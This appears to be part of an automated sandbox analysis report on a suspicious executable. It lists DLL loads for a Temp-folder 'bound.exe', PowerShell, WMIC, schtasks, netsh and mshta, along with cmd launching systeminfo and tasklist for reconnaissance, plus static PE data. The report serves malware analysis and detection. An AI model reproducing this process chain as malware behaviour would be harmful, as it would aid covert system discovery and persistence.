Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: word.lnk.15.dr

LNK file: ..\..\..\..\..\word.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: sB2ClgrGng.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: sB2ClgrGng.exe

Static file information: File size 7962066 > 1048576

Source: sB2ClgrGng.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: sB2ClgrGng.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: sB2ClgrGng.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: sB2ClgrGng.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: sB2ClgrGng.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: sB2ClgrGng.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: sB2ClgrGng.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: sB2ClgrGng.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

